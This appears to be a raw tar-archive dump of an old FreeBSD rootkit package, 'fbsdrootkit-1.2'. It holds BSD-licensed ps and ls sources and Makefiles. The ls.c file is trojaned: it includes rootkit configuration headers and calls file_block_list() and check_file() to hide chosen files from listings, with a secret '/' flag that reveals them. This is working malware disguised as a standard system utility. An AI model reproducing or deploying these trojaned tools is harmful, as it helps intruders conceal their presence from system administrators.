(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: ps.c,v 1.7.4.3 1996/06/05 02:36:12 jkh Exp $ */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1990, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)ps.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "ps.h" #ifdef P_PPWAIT #define NEWVM #endif KINFO *kinfo; struct varent *vhead, *vtail; int eval; /* exit value */ int rawcpu; /* -C */ int sumrusage; /* -S */ int termwidth; /* width of screen (0 == infinity) */ int totwidth; /* calculated width of requested variables */ static int needuser, needcomm, needenv; enum sort { DEFAULT, SORTMEM, SORTCPU } sortby = DEFAULT; static char *fmt __P((char **(*)(kvm_t *, const struct kinfo_proc *, int), KINFO *, char *, int)); static char *kludge_oldps_options __P((char *)); static int pscomp __P((const void *, const void *)); static void saveuser __P((KINFO *)); static void scanvars __P((void)); static void usage __P((void)); char dfmt[] = "pid tt state time command"; char jfmt[] = "user pid ppid pgid sess jobc state tt time command"; char lfmt[] = "uid pid ppid cpu pri nice vsz rss wchan state tt time command"; char o1[] = "pid"; char o2[] = "tt state time command"; char ufmt[] = "user pid %cpu %mem vsz rss tt state start time command"; char vfmt[] = "pid state time sl re pagein vsz rss lim tsiz %cpu %mem command"; kvm_t *kd; int main(argc, argv) int argc; char *argv[]; { struct kinfo_proc *kp; struct varent *vent; struct winsize ws; struct passwd *pwd; dev_t ttydev; pid_t pid; uid_t uid; int all, ch, flag, i, fmt, lineno, nentries; int prtheader, wflag, what, xflg; char *nlistf, *memf, *swapf, errbuf[256]; if ((ioctl(STDOUT_FILENO, TIOCGWINSZ, (char *)&ws) == -1 && ioctl(STDERR_FILENO, TIOCGWINSZ, (char *)&ws) == -1 && ioctl(STDIN_FILENO, TIOCGWINSZ, (char *)&ws) == -1) || ws.ws_col == 0) termwidth = 79; else termwidth = ws.ws_col - 1; if (argc > 1) argv[1] = kludge_oldps_options(argv[1]); all = fmt = prtheader = wflag = xflg = 0; pid = -1; uid = (uid_t) -1; ttydev = NODEV; memf = nlistf = swapf = NULL; while ((ch = getopt(argc, argv, "aCeghjLlM:mN:O:o:p:rSTt:U:uvW:wx")) != EOF) switch((char)ch) { case 'a': all = 1; break; case 'e': /* XXX set ufmt */ needenv = 1; break; case 'C': rawcpu = 1; break; case 'g': break; /* no-op */ case 'h': prtheader = ws.ws_row > 5 ? ws.ws_row : 22; break; case 'j': parsefmt(jfmt); fmt = 1; jfmt[0] = '\0'; break; case 'L': showkey(); exit(0); case 'l': parsefmt(lfmt); fmt = 1; lfmt[0] = '\0'; break; case 'M': memf = optarg; break; case 'm': sortby = SORTMEM; break; case 'N': nlistf = optarg; break; case 'O': parsefmt(o1); parsefmt(optarg); parsefmt(o2); o1[0] = o2[0] = '\0'; fmt = 1; break; case 'o': parsefmt(optarg); fmt = 1; break; case 'p': pid = atol(optarg); xflg = 1; break; case 'r': sortby = SORTCPU; break; case 'S': sumrusage = 1; break; case 'T': if ((optarg = ttyname(STDIN_FILENO)) == NULL) errx(1, "stdin: not a terminal"); /* FALLTHROUGH */ case 't': { struct stat sb; char *ttypath, pathbuf[MAXPATHLEN]; if (strcmp(optarg, "co") == 0) ttypath = _PATH_CONSOLE; else if (*optarg != '/') (void)snprintf(ttypath = pathbuf, sizeof(pathbuf), "%s%s", _PATH_TTY, optarg); else ttypath = optarg; if (stat(ttypath, &sb) == -1) err(1, "%s", ttypath); if (!S_ISCHR(sb.st_mode)) errx(1, "%s: not a terminal", ttypath); ttydev = sb.st_rdev; break; } case 'U': pwd = getpwnam(optarg); if (pwd == NULL) errx(1, "%s: no such user", optarg); uid = pwd->pw_uid; endpwent(); xflg++; /* XXX: intuitive? */ break; case 'u': parsefmt(ufmt); sortby = SORTCPU; fmt = 1; ufmt[0] = '\0'; break; case 'v': parsefmt(vfmt); sortby = SORTMEM; fmt = 1; vfmt[0] = '\0'; break; case 'W': swapf = optarg; break; case 'w': if (wflag) termwidth = UNLIMITED; else if (termwidth < 131) termwidth = 131; wflag++; break; case 'x': xflg = 1; break; case '?': default: usage(); } argc -= optind; argv += optind; #define BACKWARD_COMPATIBILITY #ifdef BACKWARD_COMPATIBILITY if (*argv) { nlistf = *argv; if (*++argv) { memf = *argv; if (*++argv) swapf = *argv; } } #endif /* * Discard setgid privileges if not the running kernel so that bad * guys can't print interesting stuff from kernel memory. */ if (nlistf != NULL || memf != NULL || swapf != NULL) setgid(getgid()); kd = kvm_openfiles(nlistf, memf, swapf, O_RDONLY, errbuf); if (kd == 0) errx(1, "%s", errbuf); if (!fmt) parsefmt(dfmt); /* XXX - should be cleaner */ if (!all && ttydev == NODEV && pid == -1 && uid == (uid_t)-1) uid = getuid(); /* * scan requested variables, noting what structures are needed, * and adjusting header widths as appropiate. */ scanvars(); /* * get proc list */ if (uid != (uid_t) -1) { what = KERN_PROC_UID; flag = uid; } else if (ttydev != NODEV) { what = KERN_PROC_TTY; flag = ttydev; } else if (pid != -1) { what = KERN_PROC_PID; flag = pid; } else { what = KERN_PROC_ALL; flag = 0; } /* * select procs */ if ((kp = kvm_getprocs(kd, what, flag, &nentries)) == 0) errx(1, "%s", kvm_geterr(kd)); if ((kinfo = malloc(nentries * sizeof(*kinfo))) == NULL) err(1, NULL); for (i = nentries; --i >= 0; ++kp) { kinfo[i].ki_p = kp; if (needuser) saveuser(&kinfo[i]); } /* * print header */ printheader(); if (nentries == 0) exit(0); /* * sort proc list */ qsort(kinfo, nentries, sizeof(KINFO), pscomp); /* * for each proc, call each variable output function. */ for (i = lineno = 0; i < nentries; i++) { if (xflg == 0 && (KI_EPROC(&kinfo[i])->e_tdev == NODEV || (KI_PROC(&kinfo[i])->p_flag & P_CONTROLT ) == 0)) continue; for (vent = vhead; vent; vent = vent->next) { (vent->var->oproc)(&kinfo[i], vent); if (vent->next != NULL) (void)putchar(' '); } (void)putchar('\n'); if (prtheader && lineno++ == prtheader - 4) { (void)putchar('\n'); printheader(); lineno = 0; } } exit(eval); } static void scanvars() { struct varent *vent; VAR *v; int i; for (vent = vhead; vent; vent = vent->next) { v = vent->var; i = strlen(v->header); if (v->width < i) v->width = i; totwidth += v->width + 1; /* +1 for space */ if (v->flag & USER) needuser = 1; if (v->flag & COMM) needcomm = 1; } totwidth--; } static char * fmt(fn, ki, comm, maxlen) char **(*fn) __P((kvm_t *, const struct kinfo_proc *, int)); KINFO *ki; char *comm; int maxlen; { char *s; if ((s = fmt_argv((*fn)(kd, ki->ki_p, termwidth), comm, maxlen)) == NULL) err(1, NULL); return (s); } static void saveuser(ki) KINFO *ki; { struct pstats pstats; struct usave *usp; struct user *u_addr = (struct user *)USRSTACK; usp = &ki->ki_u; if (kvm_uread(kd, KI_PROC(ki), (unsigned long)&u_addr->u_stats, (char *)&pstats, sizeof(pstats)) == sizeof(pstats)) { /* * The u-area might be swapped out, and we can't get * at it because we have a crashdump and no swap. * If it's here fill in these fields, otherwise, just * leave them 0. */ usp->u_start = pstats.p_start; usp->u_ru = pstats.p_ru; usp->u_cru = pstats.p_cru; usp->u_valid = 1; } else usp->u_valid = 0; /* * save arguments if needed */ if (needcomm) ki->ki_args = fmt(kvm_getargv, ki, KI_PROC(ki)->p_comm, MAXCOMLEN); else ki->ki_args = NULL; if (needenv) ki->ki_env = fmt(kvm_getenvv, ki, (char *)NULL, 0); else ki->ki_env = NULL; } static int pscomp(a, b) const void *a, *b; { int i; #ifdef NEWVM #define VSIZE(k) (KI_EPROC(k)->e_vm.vm_dsize + KI_EPROC(k)->e_vm.vm_ssize + \ KI_EPROC(k)->e_vm.vm_tsize) #else #define VSIZE(k) ((k)->ki_p->p_dsize + (k)->ki_p->p_ssize + (k)->ki_e->e_xsize) #endif if (sortby == SORTCPU) return (getpcpu((KINFO *)b) - getpcpu((KINFO *)a)); if (sortby == SORTMEM) return (VSIZE((KINFO *)b) - VSIZE((KINFO *)a)); i = KI_EPROC((KINFO *)a)->e_tdev - KI_EPROC((KINFO *)b)->e_tdev; if (i == 0) i = KI_PROC((KINFO *)a)->p_pid - KI_PROC((KINFO *)b)->p_pid; return (i); } /* * ICK (all for getopt), would rather hide the ugliness * here than taint the main code. * * ps foo -> ps -foo * ps 34 -> ps -p34 * * The old convention that 't' with no trailing tty arg means the users * tty, is only supported if argv[1] doesn't begin with a '-'. This same * feature is available with the option 'T', which takes no argument. */ static char * kludge_oldps_options(s) char *s; { size_t len; char *newopts, *ns, *cp; len = strlen(s); if ((newopts = ns = malloc(len + 2)) == NULL) err(1, NULL); /* * options begin with '-' */ if (*s != '-') *ns++ = '-'; /* add option flag */ /* * gaze to end of argv[1] */ cp = s + len - 1; /* * if last letter is a 't' flag with no argument (in the context * of the oldps options -- option string NOT starting with a '-' -- * then convert to 'T' (meaning *this* terminal, i.e. ttyname(0)). */ if (*cp == 't' && *s != '-') *cp = 'T'; else { /* * otherwise check for trailing number, which *may* be a * pid. */ while (cp >= s && isdigit(*cp)) --cp; } cp++; memmove(ns, s, (size_t)(cp - s)); /* copy up to trailing number */ ns += cp - s; /* * if there's a trailing number, and not a preceding 'p' (pid) or * 't' (tty) flag, then assume it's a pid and insert a 'p' flag. */ if (isdigit(*cp) && (cp == s || (cp[-1] != 't' && cp[-1] != 'p')) && (cp - 1 == s || cp[-2] != 't')) *ns++ = 'p'; (void)strcpy(ns, cp); /* and append the number */ return (newopts); } static void usage() { (void)fprintf(stderr, "usage:\t%s\n\t %s\n\t%s\n", "ps [-aChjlmrSTuvwx] [-O|o fmt] [-p pid] [-t tty] [-U user]", "[-M core] [-N system] [-W swap]", "ps [-L]"); exit(1); } fbsdrootkit-1.2/ps/Makefile.dist100600 764 764 400 6265032706 14137 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/2/93 # $Id: Makefile,v 1.5.4.2 1996/06/05 02:36:06 jkh Exp $ PROG= ps SRCS= fmt.c keyword.c nlist.c print.c ps.c CFLAGS+=-I/sys DPADD= ${LIBMATH} ${LIBKVM} LDADD= -lm -lkvm BINGRP= kmem BINMODE=2555 .include fbsdrootkit-1.2/ls/ 40700 764 764 0 6257406031 11455 5ustar dfdffbsdrootkit-1.2/ls/Makefile100600 764 764 273 6265015727 13205 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/2/93 # $Id: Makefile,v 1.2 1994/09/24 02:55:51 davidg Exp $ PROG= ls SRCS= cmp.c stat_flags.c ls.c print.c util.c CFLAGS+=-static .include fbsdrootkit-1.2/ls/cmp.c100600 764 764 5673 5640712470 12514 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: cmp.c,v 1.2 1994/09/24 02:55:52 davidg Exp $ */ #ifndef lint static char sccsid[] = "@(#)cmp.c 8.1 (Berkeley) 5/31/93"; #endif /* not lint */ #include #include #include #include #include "ls.h" #include "extern.h" int namecmp(a, b) const FTSENT *a, *b; { return (strcmp(a->fts_name, b->fts_name)); } int revnamecmp(a, b) const FTSENT *a, *b; { return (strcmp(b->fts_name, a->fts_name)); } int modcmp(a, b) const FTSENT *a, *b; { return (b->fts_statp->st_mtime - a->fts_statp->st_mtime); } int revmodcmp(a, b) const FTSENT *a, *b; { return (a->fts_statp->st_mtime - b->fts_statp->st_mtime); } int acccmp(a, b) const FTSENT *a, *b; { return (b->fts_statp->st_atime - a->fts_statp->st_atime); } int revacccmp(a, b) const FTSENT *a, *b; { return (a->fts_statp->st_atime - b->fts_statp->st_atime); } int statcmp(a, b) const FTSENT *a, *b; { return (b->fts_statp->st_ctime - a->fts_statp->st_ctime); } int revstatcmp(a, b) const FTSENT *a, *b; { return (a->fts_statp->st_ctime - b->fts_statp->st_ctime); } fbsdrootkit-1.2/ls/extern.h100600 764 764 5010 5640712470 13230 0ustar dfdf/*- * Copyright (c) 1991, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)extern.h 8.1 (Berkeley) 5/31/93 * $Id: extern.h,v 1.2 1994/09/24 02:55:52 davidg Exp $ */ int acccmp __P((const FTSENT *, const FTSENT *)); int revacccmp __P((const FTSENT *, const FTSENT *)); int modcmp __P((const FTSENT *, const FTSENT *)); int revmodcmp __P((const FTSENT *, const FTSENT *)); int namecmp __P((const FTSENT *, const FTSENT *)); int revnamecmp __P((const FTSENT *, const FTSENT *)); int statcmp __P((const FTSENT *, const FTSENT *)); int revstatcmp __P((const FTSENT *, const FTSENT *)); char *flags_to_string __P((u_long, char *)); void prcopy __P((char *, char *, int)); void printcol __P((DISPLAY *)); void printlong __P((DISPLAY *)); void printscol __P((DISPLAY *)); void usage __P((void)); fbsdrootkit-1.2/ls/ls.c100600 764 764 33276 6256116014 12367 0ustar dfdf/* * Copyright (c) 1989, 1993, 1994 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: ls.c,v 1.6.4.2 1996/06/05 02:35:41 jkh Exp $ */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1989, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)ls.c 8.5 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include "ls.h" #include "extern.h" /* Rootkit configuration files */ #include "../config.h" #include "../rootkitls.h" static void display __P((FTSENT *, FTSENT *)); static int mastercmp __P((const FTSENT **, const FTSENT **)); static void traverse __P((int, char **, int)); static void (*printfcn) __P((DISPLAY *)); static int (*sortfcn) __P((const FTSENT *, const FTSENT *)); long blocksize; /* block size units */ int termwidth = 80; /* default terminal width */ /* flags */ int f_accesstime; /* use time of last access */ int f_column; /* columnated format */ int f_flags; /* show flags associated with a file */ int f_inode; /* print inode */ int f_kblocks; /* print size in kilobytes */ int f_listdir; /* list actual directory, not contents */ int f_listdot; /* list files beginning with . */ int f_longform; /* long listing format */ int f_newline; /* if precede with newline */ int f_nonprint; /* show unprintables as ? */ int f_nosort; /* don't sort output */ int f_recursive; /* ls subdirectories also */ int f_reversesort; /* reverse whatever sort is used */ int f_sectime; /* print the real time for all files */ int f_singlecol; /* use single column output */ int f_size; /* list size in short listing */ int f_statustime; /* use time of last mode change */ int f_dirname; /* if precede with directory name */ int f_timesort; /* sort by time vice name */ int f_type; /* add type character for non-regular files */ int main(argc, argv) int argc; char *argv[]; { static char dot[] = ".", *dotav[] = { dot, NULL }; struct winsize win; int ch, fts_options, notused; char *p; /* Terminal defaults to -Cq, non-terminal defaults to -1. */ if (isatty(STDOUT_FILENO)) { if (ioctl(STDOUT_FILENO, TIOCGWINSZ, &win) == -1 || !win.ws_col) { if ((p = getenv("COLUMNS")) != NULL) termwidth = atoi(p); } else termwidth = win.ws_col; f_column = f_nonprint = 1; } else { f_singlecol = 1; /* retrieve environment variable, in case of explicit -C */ if ((p = getenv("COLUMNS"))) termwidth = atoi(p); } /* Root is -A automatically. */ if (!getuid()) f_listdot = 1; fts_options = FTS_PHYSICAL; /* Add the show all option for arguement parsing if defined */ #if defined(SHOWFLAG) while ((ch = getopt(argc, argv, "1ACFLRTacdfgikloqrstu/")) != EOF) { #else while ((ch = getopt(argc, argv, "1ACFLRTacdfgikloqrstu")) != EOF) { #endif switch (ch) { /* * The -1, -C and -l options all override each other so shell * aliasing works right. */ case '1': f_singlecol = 1; f_column = f_longform = 0; break; case 'C': f_column = 1; f_longform = f_singlecol = 0; break; case 'l': f_longform = 1; f_column = f_singlecol = 0; break; /* The -c and -u options override each other. */ case 'c': f_statustime = 1; f_accesstime = 0; break; case 'u': f_accesstime = 1; f_statustime = 0; break; case 'F': f_type = 1; break; case 'L': fts_options &= ~FTS_PHYSICAL; fts_options |= FTS_LOGICAL; break; case 'R': f_recursive = 1; break; case 'a': fts_options |= FTS_SEEDOT; /* FALLTHROUGH */ case 'A': f_listdot = 1; break; /* The -d option turns off the -R option. */ case 'd': f_listdir = 1; f_recursive = 0; break; case 'f': f_nosort = 1; break; case 'g': /* Compatibility with 4.3BSD. */ break; case 'i': f_inode = 1; break; case 'k': f_kblocks = 1; break; case 'o': f_flags = 1; break; case 'q': f_nonprint = 1; break; case 'r': f_reversesort = 1; break; case 's': f_size = 1; break; case 'T': f_sectime = 1; break; case 't': f_timesort = 1; break; /* Show all files if the capability is enabled */ #if defined(SHOWFLAG) case '/': showall++; break; #endif default: case '?': usage(); } } argc -= optind; argv += optind; /* Read in a list of files to block */ if(!showall) file_block_list(); /* * If not -F, -i, -l, -s or -t options, don't require stat * information. */ if (!f_inode && !f_longform && !f_size && !f_timesort && !f_type) fts_options |= FTS_NOSTAT; /* * If not -F, -d or -l options, follow any symbolic links listed on * the command line. */ if (!f_longform && !f_listdir && !f_type) fts_options |= FTS_COMFOLLOW; /* If -l or -s, figure out block size. */ if (f_longform || f_size) { if (f_kblocks) blocksize = 2; else { (void)getbsize(¬used, &blocksize); blocksize /= 512; } } /* Select a sort function. */ if (f_reversesort) { if (!f_timesort) sortfcn = revnamecmp; else if (f_accesstime) sortfcn = revacccmp; else if (f_statustime) sortfcn = revstatcmp; else /* Use modification time. */ sortfcn = revmodcmp; } else { if (!f_timesort) sortfcn = namecmp; else if (f_accesstime) sortfcn = acccmp; else if (f_statustime) sortfcn = statcmp; else /* Use modification time. */ sortfcn = modcmp; } /* Select a print function. */ if (f_singlecol) printfcn = printscol; else if (f_longform) printfcn = printlong; else printfcn = printcol; if (argc) traverse(argc, argv, fts_options); else traverse(1, dotav, fts_options); exit(0); } static int output; /* If anything output. */ /* * Traverse() walks the logical directory structure specified by the argv list * in the order specified by the mastercmp() comparison function. During the * traversal it passes linked lists of structures to display() which represent * a superset (may be exact set) of the files to be displayed. */ static void traverse(argc, argv, options) int argc, options; char *argv[]; { FTS *ftsp; FTSENT *p, *chp; int ch_options; if ((ftsp = fts_open(argv, options, f_nosort ? NULL : mastercmp)) == NULL) err(1, NULL); display(NULL, fts_children(ftsp, 0)); if (f_listdir) return; /* * If not recursing down this tree and don't need stat info, just get * the names. */ ch_options = !f_recursive && options & FTS_NOSTAT ? FTS_NAMEONLY : 0; while ((p = fts_read(ftsp)) != NULL) switch (p->fts_info) { case FTS_DC: warnx("%s: directory causes a cycle", p->fts_name); break; case FTS_DNR: case FTS_ERR: warnx("%s: %s", p->fts_name, strerror(p->fts_errno)); break; case FTS_D: if (p->fts_level != FTS_ROOTLEVEL && p->fts_name[0] == '.' && !f_listdot) break; /* * If already output something, put out a newline as * a separator. If multiple arguments, precede each * directory with its name. */ if (output) (void)printf("\n%s:\n", p->fts_path); else if (argc > 1) { (void)printf("%s:\n", p->fts_path); output = 1; } chp = fts_children(ftsp, ch_options); display(p, chp); if (!f_recursive && chp != NULL) (void)fts_set(ftsp, p, FTS_SKIP); break; } if (errno) err(1, "fts_read"); } /* * Display() takes a linked list of FTSENT structures and passes the list * along with any other necessary information to the print function. P * points to the parent directory of the display list. */ static void display(p, list) FTSENT *p, *list; { struct stat *sp; DISPLAY d; FTSENT *cur; NAMES *np; u_quad_t maxsize; u_long btotal, maxblock, maxinode, maxlen, maxnlink; int bcfile, flen, glen, ulen, maxflags, maxgroup, maxuser; int entries, needstats; char *user, *group, *flags, buf[20]; /* 32 bits == 10 digits */ /* * If list is NULL there are two possibilities: that the parent * directory p has no children, or that fts_children() returned an * error. We ignore the error case since it will be replicated * on the next call to fts_read() on the post-order visit to the * directory p, and will be signalled in traverse(). */ if (list == NULL) return; needstats = f_inode || f_longform || f_size; flen = 0; btotal = maxblock = maxinode = maxlen = maxnlink = 0; bcfile = 0; maxuser = maxgroup = maxflags = 0; flags = NULL; maxsize = 0; for (cur = list, entries = 0; cur; cur = cur->fts_link) { /* Check whether file should be blocked */ if(!showall && check_file(cur->fts_name)) { cur->fts_number=NO_PRINT; continue; } if (cur->fts_info == FTS_ERR || cur->fts_info == FTS_NS) { warnx("%s: %s", cur->fts_name, strerror(cur->fts_errno)); cur->fts_number = NO_PRINT; continue; } /* * P is NULL if list is the argv list, to which different rules * apply. */ if (p == NULL) { /* Directories will be displayed later. */ if (cur->fts_info == FTS_D && !f_listdir) { cur->fts_number = NO_PRINT; continue; } } else { /* Only display dot file if -a/-A set. */ if (cur->fts_name[0] == '.' && !f_listdot) { cur->fts_number = NO_PRINT; continue; } } if (f_nonprint) prcopy(cur->fts_name, cur->fts_name, cur->fts_namelen); if (cur->fts_namelen > maxlen) maxlen = cur->fts_namelen; if (needstats) { sp = cur->fts_statp; if (sp->st_blocks > maxblock) maxblock = sp->st_blocks; if (sp->st_ino > maxinode) maxinode = sp->st_ino; if (sp->st_nlink > maxnlink) maxnlink = sp->st_nlink; if (sp->st_size > maxsize) maxsize = sp->st_size; btotal += sp->st_blocks; if (f_longform) { user = user_from_uid(sp->st_uid, 0); if ((ulen = strlen(user)) > maxuser) maxuser = ulen; group = group_from_gid(sp->st_gid, 0); if ((glen = strlen(group)) > maxgroup) maxgroup = glen; if (f_flags) { flags = flags_to_string(sp->st_flags, "-"); if ((flen = strlen(flags)) > maxflags) maxflags = flen; } else flen = 0; if ((np = malloc(sizeof(NAMES) + ulen + glen + flen + 3)) == NULL) err(1, NULL); np->user = &np->data[0]; (void)strcpy(np->user, user); np->group = &np->data[ulen + 1]; (void)strcpy(np->group, group); if (S_ISCHR(sp->st_mode) || S_ISBLK(sp->st_mode)) bcfile = 1; if (f_flags) { np->flags = &np->data[ulen + glen + 2]; (void)strcpy(np->flags, flags); } cur->fts_pointer = np; } } ++entries; } if (!entries) return; d.list = list; d.entries = entries; d.maxlen = maxlen; if (needstats) { d.bcfile = bcfile; d.btotal = btotal; (void)snprintf(buf, sizeof(buf), "%lu", maxblock); d.s_block = strlen(buf); d.s_flags = maxflags; d.s_group = maxgroup; (void)snprintf(buf, sizeof(buf), "%lu", maxinode); d.s_inode = strlen(buf); (void)snprintf(buf, sizeof(buf), "%lu", maxnlink); d.s_nlink = strlen(buf); (void)snprintf(buf, sizeof(buf), "%qu", maxsize); d.s_size = strlen(buf); d.s_user = maxuser; } printfcn(&d); output = 1; if (f_longform) for (cur = list; cur; cur = cur->fts_link) free(cur->fts_pointer); } /* * Ordering for mastercmp: * If ordering the argv (fts_level = FTS_ROOTLEVEL) return non-directories * as larger than directories. Within either group, use the sort function. * All other levels use the sort function. Error entries remain unsorted. */ static int mastercmp(a, b) const FTSENT **a, **b; { int a_info, b_info; a_info = (*a)->fts_info; if (a_info == FTS_ERR) return (0); b_info = (*b)->fts_info; if (b_info == FTS_ERR) return (0); if (a_info == FTS_NS || b_info == FTS_NS) return (namecmp(*a, *b)); if (a_info == b_info) return (sortfcn(*a, *b)); if ((*a)->fts_level == FTS_ROOTLEVEL) if (a_info == FTS_D) return (1); else if (b_info == FTS_D) return (-1); else return (sortfcn(*a, *b)); else return (sortfcn(*a, *b)); } fbsdrootkit-1.2/ls/ls.h100600 764 764 5367 5640712473 12363 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)ls.h 8.1 